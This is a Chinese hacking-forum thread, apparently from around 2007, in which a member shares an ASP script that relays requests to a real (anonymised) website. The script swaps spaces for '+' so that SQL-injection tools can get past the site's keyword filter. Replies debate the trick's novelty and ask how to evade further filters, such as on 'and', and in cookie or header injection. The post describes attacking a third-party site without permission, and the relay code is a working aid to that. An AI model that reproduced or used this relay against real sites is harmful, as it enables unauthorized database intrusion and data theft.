[讨论]本地转发绕过SQL过滤
[讨论]本地转发绕过SQL过滤议题作者:武夫
信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])
今天检测一个站的时候,发现有SQL注入,但是当关键字和%20(空格)在一块出现的时候会提出错误,注入工具检测不了.加上他又是错误提示关闭,所以手工注入超级麻烦.为了充分发挥懒人的精神,我在本地搭建了IIS,写了如下代码,成功绕过.
Code Language : ASP
<%
id=request(\"id\") '得到变量id
id=replace(id,\" \",\"+\") '转换
url=\"http://www.xxxxx.com.cn/content.asp?id=\" & id
Set hackwolf = CreateObject(\"Microsoft.XMLHTTP\")
hackwolf.Open \"GET\",url,False
hackwolf.Send()
res=hackwolf.responseBody
x=Bytes2bStr(res)
response.write x
set hackwolf=nothing
Function Bytes2bStr(vin)
Dim BytesStream,StringReturn
Set BytesStream = Server.CreateObject(\"ADODB.Stream\")
BytesStream.Type = 2
BytesStream.Open
BytesStream.WriteText vin
BytesStream.Position = 0
BytesStream.Charset = \"GB2312\"
BytesStream.Position = 2
StringReturn =BytesStream.ReadText
BytesStream.close
Set BytesStream = Nothing
Bytes2bStr = StringReturn
End Function
%>
Parsed in 0.006 seconds
帖子18 精华[url=http://forum.eviloctal.com/digest.php?authorid=57023]0[/url] 积分3089 阅读权限100 性别男 在线时间12 小时 注册时间2006-7-11 最后登录2008-7-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=57023]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-142387.html]4fun[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 想知道为什么本地搭建了IIS,写了上面的代码, 就可以成功绕过呢? 注入软件可以自动识别你的代码? 如何操作? 可否详细赐教?
很菜的问题, 不好意思。
帖子12 精华[url=http://forum.eviloctal.com/digest.php?authorid=142387]0[/url] 积分44 阅读权限40 在线时间20 小时 注册时间2007-10-4 最后登录2008-1-25 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=142387]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=兼职&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]赚更多的钱[/url]
[url=http://forum.eviloctal.com/space-uid-585.html]fatcat[/url] [img]http://forum.eviloctal.com/images/avatars/pw/2.gif[/img]
晶莹剔透§烈日灼然 nb3里不是有空格替换的嘛,多此一举。这种东西也能叫饶过过滤,标题一个个取的真NB。晕啊晕
帖子45 精华[url=http://forum.eviloctal.com/digest.php?authorid=585]0[/url] 积分145 阅读权限40 性别男 来自浙江 在线时间68 小时 注册时间2004-11-9 最后登录2008-7-2 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=585]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=软件外包&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]软件项目外包[/url]
[url=http://forum.eviloctal.com/space-uid-11912.html]pt007[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 挺不错的,这个可不仅仅能绕过空格哦,发挥一下想象力,HEHE每个人都有属于自已的世界,人生因此而精彩,HACK就是我的世界!
[url=http://wpa.qq.com/msgrd?V=1&Uin=7491805&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子209 精华[url=http://forum.eviloctal.com/digest.php?authorid=11912]30[/url] 积分3816 阅读权限100 性别男 在线时间433 小时 注册时间2005-9-9 最后登录2008-7-23 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=11912]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-32116.html]ttfct[/url] [img]http://forum.eviloctal.com/customavatars/32116.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 这个是刺猬早就发过了,不久是这个,还可以HTTP头TTFCT http://WWW.TTFCT.COM
[url=http://wpa.qq.com/msgrd?V=1&Uin=420079600&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子279 精华[url=http://forum.eviloctal.com/digest.php?authorid=32116]4[/url] 积分4349 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-20 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=32116]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-57023.html]武夫[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 引用:
引用第2楼fatcat于2007-10-17 00:39发表的 :
nb3里不是有空格替换的嘛,多此一举。这种东西也能叫饶过过滤,标题一个个取的真NB。
你懂什么叫以小见大嘛?
我拿这代码改改可以对付十种以上的不同的站
帖子18 精华[url=http://forum.eviloctal.com/digest.php?authorid=57023]0[/url] 积分3089 阅读权限100 性别男 在线时间12 小时 注册时间2006-7-11 最后登录2008-7-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=57023]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=风水&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]良辰择日,预测咨询,公司改名,权威易经[/url]
[url=http://forum.eviloctal.com/space-uid-142387.html]4fun[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 见过别人cookies 注入时用过类似的方法。 楼主可否展开些讲, 这样我等菜鸟接受起来容易些。
比如, 同时过滤了 空格和and 等等情况 该如何替换?
先谢了!
帖子12 精华[url=http://forum.eviloctal.com/digest.php?authorid=142387]0[/url] 积分44 阅读权限40 在线时间20 小时 注册时间2007-10-4 最后登录2008-1-25 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=142387]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-74393.html]gmwshz[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然
页:
[1]